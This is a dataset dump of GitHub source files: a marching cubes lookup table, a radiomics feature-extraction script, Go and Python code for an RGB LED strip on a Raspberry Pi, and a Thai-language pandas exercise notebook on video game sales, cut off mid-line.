3, 5, 1, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 11, 0, 11, 5, 0, 5, 1, 5, 11, 6, -1, -1, -1, -1 },\n { 3, 11, 6, 0, 3, 6, 0, 6, 5, 0, 5, 9, -1, -1, -1, -1 },\n { 6, 5, 9, 6, 9, 11, 11, 9, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 10, 6, 4, 7, 8, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 3, 0, 4, 7, 3, 6, 5, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 9, 0, 5, 10, 6, 8, 4, 7, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 6, 5, 1, 9, 7, 1, 7, 3, 7, 9, 4, -1, -1, -1, -1 },\n { 6, 1, 2, 6, 5, 1, 4, 7, 8, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 5, 5, 2, 6, 3, 0, 4, 3, 4, 7, -1, -1, -1, -1 },\n { 8, 4, 7, 9, 0, 5, 0, 6, 5, 0, 2, 6, -1, -1, -1, -1 },\n { 7, 3, 9, 7, 9, 4, 3, 2, 9, 5, 9, 6, 2, 6, 9, -1 },\n { 3, 11, 2, 7, 8, 4, 10, 6, 5, -1, -1, -1, -1, -1, -1, -1 },\n { 5, 10, 6, 4, 7, 2, 4, 2, 0, 2, 7, 11, -1, -1, -1, -1 
},\n { 0, 1, 9, 4, 7, 8, 2, 3, 11, 5, 10, 6, -1, -1, -1, -1 },\n { 9, 2, 1, 9, 11, 2, 9, 4, 11, 7, 11, 4, 5, 10, 6, -1 },\n { 8, 4, 7, 3, 11, 5, 3, 5, 1, 5, 11, 6, -1, -1, -1, -1 },\n { 5, 1, 11, 5, 11, 6, 1, 0, 11, 7, 11, 4, 0, 4, 11, -1 },\n { 0, 5, 9, 0, 6, 5, 0, 3, 6, 11, 6, 3, 8, 4, 7, -1 },\n { 6, 5, 9, 6, 9, 11, 4, 7, 9, 7, 11, 9, -1, -1, -1, -1 },\n { 10, 4, 9, 6, 4, 10, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 4, 10, 6, 4, 9, 10, 0, 8, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 0, 1, 10, 6, 0, 6, 4, 0, -1, -1, -1, -1, -1, -1, -1 },\n { 8, 3, 1, 8, 1, 6, 8, 6, 4, 6, 1, 10, -1, -1, -1, -1 },\n { 1, 4, 9, 1, 2, 4, 2, 6, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 3, 0, 8, 1, 2, 9, 2, 4, 9, 2, 6, 4, -1, -1, -1, -1 },\n { 0, 2, 4, 4, 2, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 8, 3, 2, 8, 2, 4, 4, 2, 6, -1, -1, -1, -1, -1, -1, -1 },\n { 10, 4, 9, 10, 6, 4, 11, 2, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 8, 2, 2, 8, 11, 4, 9, 10, 4, 10, 6, -1, -1, -1, -1 },\n { 3, 11, 2, 0, 1, 6, 0, 6, 4, 6, 1, 10, -1, -1, -1, -1 },\n { 6, 4, 1, 6, 1, 10, 4, 8, 1, 2, 1, 11, 8, 11, 1, -1 },\n { 9, 6, 4, 9, 3, 6, 9, 1, 3, 11, 6, 3, -1, -1, -1, -1 },\n { 8, 11, 1, 8, 1, 0, 11, 6, 1, 9, 1, 4, 6, 4, 1, -1 },\n { 3, 11, 6, 3, 6, 0, 0, 6, 4, -1, -1, -1, -1, -1, -1, -1 },\n { 6, 4, 8, 11, 6, 8, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 7, 10, 6, 7, 8, 10, 8, 9, 10, -1, -1, -1, -1, -1, -1, -1 },\n { 0, 7, 3, 0, 10, 7, 0, 9, 10, 6, 7, 10, -1, -1, -1, -1 },\n { 10, 6, 7, 1, 10, 7, 1, 7, 8, 1, 8, 0, -1, -1, -1, -1 },\n { 10, 6, 7, 10, 7, 1, 1, 7, 3, -1, -1, -1, -1, -1, -1, -1 },\n { 1, 2, 6, 1, 6, 8, 1, 8, 9, 8, 6, 7, -1, -1, -1, -1 },\n { 2, 6, 9, 2, 9, 1, 6, 7, 9, 0, 9, 3, 7, 3, 9, -1 },\n { 7, 8, 0, 7, 0, 6, 6, 0, 2, -1, -1, -1, -1, -1, -1, -1 },\n { 7, 3, 2, 6, 7, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 2, 3, 11, 10, 6, 8, 10, 8, 9, 8, 6, 7, -1, -1, -1, -1 },\n { 2, 0, 7, 2, 7, 11, 0, 9, 7, 6, 7, 10, 9, 10, 7, -1 },\n { 1, 8, 0, 1, 7, 8, 1, 10, 7, 6, 7, 10, 2, 3, 11, -1 },\n { 11, 2, 1, 11, 1, 7, 10, 6, 1, 6, 7, 1, -1, -1, -1, -1 },\n { 8, 9, 6, 8, 6, 7, 9, 1, 6, 11, 6, 3, 1, 3, 6, -1 },\n { 0, 9, 1, 11, 6, 7, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 },\n { 7, 8, 0, 7, 0, 6, 3, 11, 0, 11, 6, 0, -1, -1, -1, -1 },\n { 7, 11, 6, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1 }\n};\n\n// Vertlist represents the location of some point somewhere on an edge of the cube, relative to the origin (0, 0, 0).\n// As the points on the cube are always either 0 or 1 (masked/not-masked) that other point is always halfway.\n// Therefore, vertlist is constant and can be defined static (only works when the intersection point is constant\n// (in this case the intersection point is always 0.5). 
The edge represented is defined by the gridAngle points as follows:\n// { { 1, 0 }, { 2, 1 }, { 3, 2 }, { 3, 0 },\n// { 5, 4 }, { 6, 5 }, { 7, 6 }, { 7, 4 },\n// { 4, 0 }, { 5, 1 }, { 6, 2 }, { 7, 0 } }\nstatic const double vertList[12][3] = { { 0, 0, 0.5 }, { 0, 0.5, 1 }, { 0, 1, 0.5 }, { 0, 0.5, 0 },\n { 1, 0, 0.5 }, { 1, 0.5, 1 }, { 1, 1, 0.5 }, { 1, 0.5, 0 },\n { 0.5, 0, 0 }, { 0.5, 0, 1 }, { 0.5, 1, 1 }, { 0.5, 1, 0 } };\n" }, { "alpha_fraction": 0.6897942423820496, "alphanum_fraction": 0.6918798685073853, "avg_line_length": 35.693878173828125, "blob_id": "c3816856c750a49291a6a87ce2dc817c665721f5", "content_id": "b21b6503235c5bf8952330ea14b90a6fa3e6e89e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7192, "license_type": "permissive", "max_line_length": 120, "num_lines": 196, "path": "/radiomics/scripts/segment.py", "repo_name": "drmaxchen/pyradio", "src_encoding": "UTF-8", "text": "from collections import OrderedDict\nimport csv\nfrom datetime import datetime\nfrom functools import partial\nimport json\nimport logging\nimport os\nimport threading\n\nimport numpy\nimport SimpleITK as sitk\nimport six\n\nfrom radiomics import featureextractor, setVerbosity\n\ncaseLogger = logging.getLogger('radiomics.script')\n\n\ndef extractSegment(case_idx, case, config, config_override):\n global caseLogger\n\n # Instantiate the output\n feature_vector = OrderedDict(case)\n\n try:\n t = datetime.now()\n\n imageFilepath = case['Image'] # Required\n maskFilepath = case['Mask'] # Required\n label = case.get('Label', None) # Optional\n if isinstance(label, six.string_types):\n label = int(label)\n\n # Instantiate Radiomics Feature extractor\n extractor = featureextractor.RadiomicsFeaturesExtractor(config, **config_override)\n\n # Extract features\n feature_vector.update(extractor.execute(imageFilepath, maskFilepath, label))\n\n # Display message\n delta_t = datetime.now() - t\n caseLogger.info('Patient %s processed in %s', case_idx, delta_t)\n\n except Exception:\n caseLogger.error('Feature extraction failed!', exc_info=True)\n\n return feature_vector\n\n\ndef extractSegment_parallel(args, parallel_config=None):\n if parallel_config is not None:\n _configurParallelExtraction(parallel_config)\n # set thread name to patient name\n threading.current_thread().name = 'case %s' % args[0] # args[0] = case_idx\n return extractSegment(*args)\n\n\ndef extractSegmentWithTempFiles(case_idx, case, config, config_override, temp_dir):\n global caseLogger\n\n filename = os.path.join(temp_dir, 'features_%s.csv' % case_idx)\n if os.path.isfile(filename):\n # Output already generated, load result (prevents re-extraction in case of interrupted process)\n with open(filename, 'w') as outputFile:\n reader = csv.reader(outputFile)\n headers = reader.rows[0]\n values = reader.rows[1]\n feature_vector = OrderedDict(zip(headers, values))\n\n caseLogger.info('Patient %s already processed, reading results...', case_idx)\n else:\n # Extract the set of features. Set parallel_config flag to None, as any logging initialization is already handled.\n feature_vector = extractSegment(case_idx, case, config, config_override)\n\n # Store results in temporary separate files to prevent write conflicts\n # This allows for the extraction to be interrupted. 
Upon restarting, already processed cases are found in the\n # TEMP_DIR directory and loaded instead of re-extracted\n with open(filename, 'w') as outputFile:\n writer = csv.DictWriter(outputFile, fieldnames=list(feature_vector.keys()), lineterminator='\\n')\n writer.writeheader()\n writer.writerow(feature_vector)\n\n return feature_vector\n\n\ndef extractSegmentWithTempFiles_parallel(args, parallel_config=None):\n if parallel_config is not None:\n _configurParallelExtraction(parallel_config)\n # set thread name to patient name\n threading.current_thread().name = 'case %s' % args[0] # args[0] = case_idx\n return extractSegmentWithTempFiles(*args)\n\n\ndef processOutput(results,\n outStream,\n skip_nans=False,\n format_output='csv',\n format_path='absolute',\n relative_path_start=''):\n global caseLogger\n caseLogger.info('Processing results...')\n\n # Store the header of all calculated features\n headers = results[0].keys()\n\n # Set the formatting rule for image and mask paths\n if format_path == 'absolute':\n pathFormatter = os.path.abspath\n elif format_path == 'relative':\n pathFormatter = partial(os.path.relpath, start=relative_path_start)\n elif format_path == 'basename':\n pathFormatter = os.path.basename\n else:\n caseLogger.warning('Unrecognized format for paths (%s), reverting to default (\"absolute\")', format_path)\n pathFormatter = os.path.abspath\n\n for case_idx, case in enumerate(results, start=1):\n # if specified, skip NaN values\n if skip_nans:\n for key in list(case.keys()):\n if isinstance(case[key], float) and numpy.isnan(case[key]):\n caseLogger.debug('Case %d, feature %s computed NaN, removing from results', case_idx, key)\n del case[key]\n\n # Format paths of image and mask files\n case['Image'] = pathFormatter(case['Image'])\n case['Mask'] = pathFormatter(case['Mask'])\n\n # Write out results\n if format_output not in ('csv', 'json', 'txt'):\n caseLogger.warning('Unrecognized format for output (%s), reverting to default (\"csv\")', format_output)\n format_output = 'csv'\n\n if format_output == 'csv':\n writer = csv.DictWriter(outStream, headers, lineterminator='\\n')\n if case_idx == 1:\n writer.writeheader()\n writer.writerow(case) # if skip_nans is enabled, nan-values are written as empty strings\n elif format_output == 'json':\n json.dump(case, outStream)\n outStream.write('\\n')\n else: # txt\n for k, v in six.iteritems(case):\n outStream.write('Case-%d_%s: %s\\n' % (case_idx, k, v))\n\n\ndef _configurParallelExtraction(parallel_config):\n \"\"\"\n Initialize logging for parallel extraction. 
This needs to be done here, as it needs to be done for each thread that is\n created.\n \"\"\"\n # Configure logging\n ###################\n\n rLogger = logging.getLogger('radiomics')\n\n # Add logging to file is specified\n logFile = parallel_config.get('logFile', None)\n if logFile is not None:\n logHandler = logging.FileHandler(filename=logFile, mode='a')\n logHandler.setLevel(parallel_config.get('logLevel', logging.INFO))\n rLogger.addHandler(logHandler)\n\n # Include thread name in Log-message output for all handlers.\n parallelFormatter = logging.Formatter('[%(asctime)-.19s] %(levelname)-.1s: (%(threadName)s) %(name)s: %(message)s')\n for h in rLogger.handlers:\n h.setFormatter(parallelFormatter)\n\n if parallel_config.get('addFilter', True):\n # Define filter that allows messages from specified filter and level INFO and up, and level WARNING and up from\n # other loggers.\n class info_filter(logging.Filter):\n def __init__(self, name):\n super(info_filter, self).__init__(name)\n self.level = logging.WARNING\n\n def filter(self, record):\n if record.levelno >= self.level:\n return True\n if record.name == self.name and record.levelno >= logging.INFO:\n return True\n return False\n\n # Adding the filter to the first handler of the radiomics logger limits the info messages on the output to just\n # those from radiomics.script, but warnings and errors from the entire library are also printed to the output.\n # This does not affect the amount of logging stored in the log file.\n outputhandler = rLogger.handlers[0] # Handler printing to the output\n outputhandler.addFilter(info_filter('radiomics.script'))\n\n # Ensures that log messages are being passed to the filter with the specified level\n setVerbosity(parallel_config.get('verbosity', logging.INFO))\n\n # Ensure the entire extraction for each cases is handled on 1 thread\n ####################################################################\n\n sitk.ProcessObject_SetGlobalDefaultNumberOfThreads(1)\n" } ]
5
thethorne48/rgb_test
https://github.com/thethorne48/rgb_test
99e055fe68d7dcbe1c324cfaeeb320810a7df915
7dae84c89dd41dad68d2ecf0bd91ca3a317f5851
396b35cd8fe16701bc7fea8d6cc5fa2608bd24f1
refs/heads/master
2020-06-23T19:25:32.667070
2019-08-12T22:16:00
2019-08-12T22:16:00
198,731,320
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5663924813270569, "alphanum_fraction": 0.6180963516235352, "avg_line_length": 18.19548797607422, "blob_id": "28a5ec47a5d2e725f473d65ba2a6e6190ea1693e", "content_id": "33f3bff1121c96c236daee8e53f72b8853bb7566", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2553, "license_type": "permissive", "max_line_length": 63, "num_lines": 133, "path": "/rgb/old/rainbow.go", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"math\"\n\t\"os\"\n\t\"time\"\n\n\t\"github.com/jgarff/rpi_ws281x/golang/ws2811\"\n)\n\nconst (\n\tpin = 18\n\tcount = 150\n\tbrightness = 100\n\tmaxAngle = 360\n)\n\n// RGB - a set of arrays to hold pre-calculated RGB values\ntype RGB struct {\n\tred []uint8\n\tgreen []uint8\n\tblue []uint8\n}\n\nfunc main() {\n\tdefer ws2811.Fini()\n\tcolorValues := initRange(count)\n\terr := ws2811.Init(pin, count, brightness)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfmt.Println(\"Press Ctr-C to quit.\")\n\n\t\tfmt.Println(\"Creating cosine rainbow\")\n\t\tfor index := 0; index <= 1000; index++ {\n\t\t\terr = rainbowCosCycle(colorValues, index)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during cycle \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t}\n\n\t\tfmt.Println(\"Creating color flash\")\n\t\tcolors := [...]uint32{\n\t\t\t0xFF0000, // green\n\t\t\t0x888800, // yellow\n\t\t\t0x00FF00, // red\n\t\t\t0x00FFFF, // purple\n\t\t\t0x0000FF, // blue\n\t\t\t0xFF00FF, // cyan\n\t\t}\n\t\tfor i := 0; i < len(colors); i++ {\n\t\t\terr = colorFlash(colors[i])\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during flash \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t}\n\n\t}\n}\n\nfunc initRange(ledCount int) RGB {\n\tfloats := RGB{\n\t\tred: []uint8{},\n\t\tgreen: []uint8{},\n\t\tblue: []uint8{},\n\t}\n\n\tsegmentSize := (math.Pi * 3) / float64(ledCount)\n\tmaxBrightness := float64(180)\n\tpiDivision := float64(2)\n\n\tfor i := math.Pi * -1; i <= math.Pi*2; i += segmentSize {\n\t\tred := math.Sin(i/piDivision + math.Pi/2)\n\t\tblue := math.Sin(i / piDivision)\n\t\tfloats.red = SinAppend(floats.red, red, maxBrightness)\n\t\tfloats.blue = SinAppend(floats.blue, blue, maxBrightness)\n\t\tif i <= 0 {\n\t\t\tgreen := math.Sin(i/piDivision + math.Pi)\n\t\t\tfloats.green = SinAppend(floats.green, green, maxBrightness)\n\t\t} else {\n\t\t\tgreen := math.Sin(i/piDivision - math.Pi/2)\n\t\t\tfloats.green = SinAppend(floats.green, green, maxBrightness)\n\t\t}\n\t}\n\n\treturn floats\n}\n\nfunc rainbowCosCycle(floats RGB, seed int) error {\n\tfor i := 0; i < count; i++ {\n\t\tws2811.SetLed(i, RainbowCosColor(floats, i+seed))\n\t}\n\terr := ws2811.Render()\n\tif err != nil {\n\t\tws2811.Clear()\n\t\treturn err\n\t}\n\ttime.Sleep(5 * time.Millisecond)\n\treturn nil\n}\n\nfunc colorWipe(color uint32) error {\n\tfor i := 0; i < count; i++ {\n\t\tws2811.SetLed(i, color)\n\t\terr := ws2811.Render()\n\t\tif err != nil {\n\t\t\tws2811.Clear()\n\t\t\treturn err\n\t\t}\n\n\t\ttime.Sleep(5 * time.Millisecond)\n\t}\n\n\treturn nil\n}\n\nfunc colorFlash(color uint32) error {\n\tfor i := 0; i < count; i++ {\n\t\tws2811.SetLed(i, color)\n\t}\n\terr := ws2811.Render()\n\tif err != nil {\n\t\tws2811.Clear()\n\t\treturn err\n\t}\n\n\ttime.Sleep(5 * time.Second)\n\n\treturn nil\n}\n" }, { "alpha_fraction": 0.5610389709472656, "alphanum_fraction": 0.5896103978157043, "avg_line_length": 20.38888931274414, "blob_id": 
"131f3fcac07c3b4aa6be92e53a94590b56121a22", "content_id": "851523451d172cff58083458fc30d41c1c9c6617", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "permissive", "max_line_length": 59, "num_lines": 18, "path": "/power_test.py", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport RPi.GPIO as GPIO\nimport time\n\nredLED = 35\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(redLED, GPIO.IN)\n\npowerlow = 0\nwhile True:\n if(GPIO.input(redLED) == 0):\n print(\"POWER dipped below 4.63V\")\n powerlow += 1\n else:\n powerlow = 0\n if (powerlow > 3):\n print(f\"Low power for {str(powerlow)} seconds\")\n time.sleep(1)\n" }, { "alpha_fraction": 0.7555555701255798, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 44.25, "blob_id": "09dcfc4ae1ce33ca28d1ad07f206d712897aa543", "content_id": "b1557bdff751bfaebdb73ad58cc6674ac0be4b26", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 180, "license_type": "permissive", "max_line_length": 129, "num_lines": 4, "path": "/README.md", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "# rgb_test\nTesting controlling an RGB light strip\n\n[![Snap Status](https://build.snapcraft.io/badge/thethorne48/rgb_test.svg)](https://build.snapcraft.io/user/thethorne48/rgb_test)" }, { "alpha_fraction": 0.5649484395980835, "alphanum_fraction": 0.6061855554580688, "avg_line_length": 17.417720794677734, "blob_id": "8732eb68f314fcd63f4b57c3ea2874ca983eec4c", "content_id": "c0a8f68a61ddc40f302a4b661b63279dbaab9f2f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1455, "license_type": "permissive", "max_line_length": 57, "num_lines": 79, "path": "/rgb/rgb.go", "repo_name": "thethorne48/rgb_test", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"os\"\n\t\"time\"\n\n\tws \"github.com/rpi-ws281x/rpi-ws281x-go\"\n)\n\nconst (\n\tpin = 18\n\tcount = 150\n\tbrightness = 100\n)\n\n// main test program\nfunc main() {\n\topt := ws.DefaultOptions\n\topt.Channels[0].LedCount = count\n\topt.Channels[0].Brightness = brightness\n\n\tled, err := ws.MakeWS2811(&opt)\n\tif err != nil {\n\t\t// desc := ws.StatusDesc(err.)\n\t\tpanic(err)\n\t}\n\terr = led.Init()\n\tdefer led.Fini()\n\tif err != nil {\n\t\t// desc := ws.StatusDesc(err.)\n\t\tpanic(err)\n\t}\n\n\tfmt.Println(\"Press Ctr-C to quit.\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfor ok := true; ok; {\n\t\t\tfmt.Println(\"Creating blue color wipe\")\n\t\t\terr = colorWipe(led, uint32(0x000020))\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during wipe \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\n\t\t\tfmt.Println(\"Creating red color wipe\")\n\t\t\terr = colorWipe(led, uint32(0x002000))\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during wipe \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\n\t\t\tfmt.Println(\"Creating green color wipe\")\n\t\t\terr = colorWipe(led, uint32(0x200000))\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error during wipe \" + err.Error())\n\t\t\t\tos.Exit(-1)\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunc colorWipe(instance *ws.WS2811, color uint32) error {\n\tcolors := instance.Leds(0)\n\tfor i := 0; i < count; i++ {\n\t\tcolors[i] = color\n\t\terr := instance.SetLedsSync(0, colors)\n\t\terr = instance.Render()\n\t\tif err != nil {\n\t\t\tinstance.Wait()\n\t\t\treturn 
err\n\t\t}\n\n\t\ttime.Sleep(5 * time.Millisecond)\n\t}\n\n\treturn nil\n}\n" } ]
4
benjaratc/Project1-Python-
https://github.com/benjaratc/Project1-Python-
4286548201e531ea957890d45f2653c108588ae7
3f4962da735480cd4706cb1db54cd90bd375d09a
9a93a0f642dbb0688bdeda5746c973a9b62eadc2
refs/heads/master
2022-09-10T00:17:50.857201
2020-05-29T13:13:24
2020-05-29T13:13:24
267,849,521
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6097561120986938, "alphanum_fraction": 0.6585366129875183, "avg_line_length": 7.199999809265137, "blob_id": "cf1888079f1c9f2238951987995ddfe381615f6b", "content_id": "f2b1ac2b36d0f268203b9842869553b91afe11b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 41, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/README.md", "repo_name": "benjaratc/Project1-Python-", "src_encoding": "UTF-8", "text": "# Project1-Python-\n\nData Camp 2 \n\nBenjarat Chavanabutvilai\n" }, { "alpha_fraction": 0.5995112657546997, "alphanum_fraction": 0.6464457511901855, "avg_line_length": 17.549333572387695, "blob_id": "f08e0996c3a9f14cbbd0de745f5673aeb85c995f", "content_id": "8502e44505499aa892738482becf3f3f873d281b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19305, "license_type": "no_license", "max_line_length": 169, "num_lines": 750, "path": "/Project 1 Capstone .py", "repo_name": "benjaratc/Project1-Python-", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# Part 1 \n\n# 1. จงเขียนโปรแกรมรับค่า Input จากผู้ใช้ ถ้าผู้ใช้ใส่ 0.0 จึงจะสิ้นสุดโปรแกรม คำนวณหาค่าเฉลี่ยของเลขทั้งหมดที่ผู้ใช้ใส่ และปริ้นค่าเฉลี่ยคูณด้วยจำนวนครั้งที่ใส่ทั้งหมด \n\n# In[7]:\n\n\nCount = 0\nSum = 0 \n\nnum = float(input('ใส่ตัวเลขใดๆ (ถ้าใส่ 0.0 สิ้นสุดโปรแกรม ) :')) \n\nwhile num != 0.0:\n Sum = Sum + num\n Count +=1\n num = float(input('ใส่ตัวเลขใดๆ (ถ้าใส่ 0.0 สิ้นสุดโปรแกรม ) :')) \n\navg = Sum/Count \nprint(avg*Count)\nprint('Finished')\n\n\n# 2. จงเขียนโปรแกรมให้ผู้ใช้ใส่เลข ขอบเขตล่าง และ ขอบเขตบน และคำนวณหาเลขจำนวนเฉพาะ (Prime Number) ที่อยู่ระหว่างขอบเขตล่างและขอบเขตบน\n\n# In[735]:\n\n\nlow_bound = int(input('Enter a low bound number :')) #if_else \nup_bound = int(input('Enter a high bound number :')) \n\nfor num in range(low_bound,up_bound +1): \n if num > 1:\n for i in range(2,num):\n if num % i == 0:\n break \n else:\n print('%d is a prime number' %(num))\n\n# %s - String (or any object with a string representation, like numbers)\n# %d - Integers\n# %f - Floating point numbers \n\n\n# Part 2 : Video Game Sales \n\n# In[46]:\n\n\nimport numpy as np\nimport pandas as pd \nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport seaborn as sns\nimport plotly.express as px\nimport plotly.graph_objects as go\n\n\n# 1. Import ไฟล์ vgsales เช็คข้อมูลเบื้องต้น\n\n# In[183]:\n\n\ndf = pd.read_csv('../Desktop/DataCamp/vgsales.csv')\ndf.head()\n\n\n# In[185]:\n\n\ndf.info()\n\n\n# In[181]:\n\n\ndf.describe()\n\n\n# 2. สุ่มอ่านข้อมูล 10 แถว หัว 5 แถว และท้าย 10 แถว\n\n# In[57]:\n\n\ndf.sample(10)\n\n\n# In[55]:\n\n\ndf.head(5)\n\n\n# In[56]:\n\n\ndf.tail(10)\n\n\n# 3. หา Top 10 Platform ยอดฮิต พร้อมระบุจำนวน\n\n# In[187]:\n\n\ncountPlatform = df['Platform'].value_counts() #df['Platform'].value_counts().head(10)\ncountPlatform.head(10)\n\n\n# 4. หา Bottom 10 Platform ยอดฮิต พร้อมระบุจำนวน\n\n# In[75]:\n\n\ncountPlatform = df['Platform'].value_counts()\ncountPlatform.tail(10)\n\n\n# 5. หา Top 10 Platform ชนิดของเกมส์ยอดฮิต พร้อมระบุจำนวน \n\n# In[77]:\n\n\ngroupPlatform = df['Genre'].value_counts()\ncountGenre.head(10)\n\n\n# 6. หา Bottom 10 Platform ชนิดของเกมส์ยอดฮิต พร้อมระบุจำนวน\n\n# In[78]:\n\n\ncountGenre = df['Genre'].value_counts()\ncountGenre.tail(10)\n\n\n# 7. หารายละเอียดเกมส์ GTA V ภาคต่างๆ ทั้งหมด \n\n# In[190]:\n\n\ndf[df['Name'] == 'Grand Theft Auto V']\n\n\n# 8. 
หาจำนวนเกมส์ที่มีชื่อซ้ำกันทั้งหมด\n\n# In[208]:\n\n\ndf[df['Name'].duplicated(keep = False)].sort_values('Name') #keep = False คือซ้ำกันหมดจะออกมาอยู่ด้วย\n\n\n# 9. หาจำนวนเกมส์ที่มีชื่อและ Platform ซ้ำกันทั้งหมด\n\n# In[210]:\n\n\ndf[df[['Name','Platform']].duplicated(keep = False)].sort_values('Name')\n\n\n# 10. จากข้อ 9 พิจารณาแถวที่ข้อมูลซ้ำแและลบแถวนั้น\n\n# In[225]:\n\n\ndf_new = df.drop(df.index[[16127,14999,4145]]) #or inplace = True\ndf_new.head()\n\n\n# 11. หารายได้ทั้งหมดเกมส์ FIFA 15\n\n# In[313]:\n\n\ndf2 = df_new.groupby('Name').sum().reset_index()\ndf2\n\n\n# In[231]:\n\n\ndf2[df2['Name'] == 'FIFA 15']\n\n\n# 12. หารายได้ทั้งหมดของเกมส์ GTA V ในญี่ปุ่น\n\n# In[232]:\n\n\ndf2[df2['Name'] == 'Grand Theft Auto V']\n\n\n# 13. สร้าง DF ที่ให้ index เป็นรายชื่อของเกมส์ที่มีซ้ำ และ Column เป็นจำนวนที่มีซ้ำ ไม่นับที่เป็น Unique\n\n# In[385]:\n\n\ncount = df_new['Name'].value_counts()\ncount = pd.DataFrame(count)\ncount = count[count['Name']>1]\ncount.rename(columns = {'Name':'Count'})\n\n\n# 14. สร้าง DF ที่มี index เป็นชื่อบริษัท และเรียงลำดับตามรายได้รวมจากมากไปน้อย\n\n# In[393]:\n\n\npublisher = df_new.groupby('Publisher').sum().sort_values('Global_Sales')[::-1]\npublisher = publisher['Global_Sales']\npublisher = pd.DataFrame(publisher).reset_index()\npublisher\n\n\n# 15. จงสร้าง DF ที่บรรจุเกมส์ Series Call of duty ทั้งหมด\n\n# In[416]:\n\n\ncallOfDuty = df_new[df_new['Name'].apply(lambda check: check[0:12] == 'Call of Duty')]\ncallOfDuty\n\n\n# 16. จงหาว่า Call of Duty ภาคใดใน PC มีรายสูงสุดในยุโรป 5 อันดับแรก\n\n# In[420]:\n\n\nPC = callOfDuty[callOfDuty['Platform']=='PC'].sort_values('EU_Sales')[::-1].head(5)\nPC\n\n\n# 17. จงหาว่า Platform ใด มียอดขายรวมสูงสุดในยุโรป\n\n# In[242]:\n\n\ndf_new.groupby('Platform').sum().sort_values('EU_Sales')[::-1].head(1)\n\n\n# 18. จงหาว่าเกมส์ประเภทใดมียอดขายเฉลี่ยสูงสุดในภูมิภาคอื่นๆรอบโลก\n\n# In[243]:\n\n\ndf_new.groupby('Genre').sum().sort_values('Global_Sales')[::-1].head(1)\n\n\n# 19. สร้าง Bar Plot โดยให้แกน X เป็น Platform และ Y เป็นยอดขายทั่วโลก\n\n# In[334]:\n\n\nfig = plt.figure(figsize = (18,10))\nsns.barplot(data = df_new, x ='Platform', y = 'Global_Sales')\n\n\n# 20. สร้าง Pie Chart หาส่วนแบ่งทางการตลาดของ 5 บริษัทแรกที่มีรายได้มากที่สุด\n\n# In[421]:\n\n\nTop5MarketShare = df.groupby('Publisher').sum().sort_values('Global_Sales')[::-1].head(5)\nTop5MarketShare\n\n\n# In[422]:\n\n\nfig = px.pie(Top5MarketShare, values = 'Global_Sales', names = Top5MarketShare.index)\nfig.show()\n\n\n# 21. สร้าง Count Plot นับข้อมูลประเภทของเกมส์\n\n# In[423]:\n\n\nfig = plt.figure(figsize = (22,8))\nsns.countplot(x='Genre', data = df_new)\nfig.show()\n\n\n# 22. สร้าง Bar plot Top 5 รายได้ทั่วโลกของ Call of Duty ภาคต่างๆใน Xbox\n\n# In[449]:\n\n\ntop5callOfDuty = callOfDuty[callOfDuty['Platform'] == 'X360'].sort_values('Global_Sales')[::-1].head(5)\ntop5callOfDuty\n\n\n# In[446]:\n\n\nfig = plt.figure(figsize = (20,8))\nsns.barplot(data = top5callOfDuty, x = 'Name', y = 'Global_Sales')\nfig.show()\n\n\n# 23. สร้าง Line Graph แสดงรายได้จาก North America จากปีแรกถึงปีสุดท้าย\n\n# In[286]:\n\n\nyear = df.groupby('Year').sum()\nyear.head()\n\n\n# In[451]:\n\n\nfig = px.line(year, 